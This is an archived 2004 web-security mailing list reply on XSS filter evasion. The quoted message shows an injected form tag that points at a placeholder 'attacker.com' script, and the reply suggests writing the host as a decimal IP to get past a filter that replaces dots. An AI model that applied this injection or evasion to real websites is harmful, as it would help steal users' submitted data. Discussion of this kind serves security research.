WebApp Sec mailing list archives
Re: Fullstop Substitution in XSS
From: Joseph Birr-Pixton <me () ifihada com>
Date: Tue, 01 Jun 2004 13:44:13 +0100
Calum Power wrote:
My problem lies in the output of the form tags. Any: <form target="http://attacker.com/path/to/script"> is of course being filtered into: <form target="http://attacker_com/path/to/script"> Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously). Any help would be appreciated.
http://3639551331/search?q=decimal+ip+address Oldest trick in the book :) -- Joseph Birr-Pixton
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)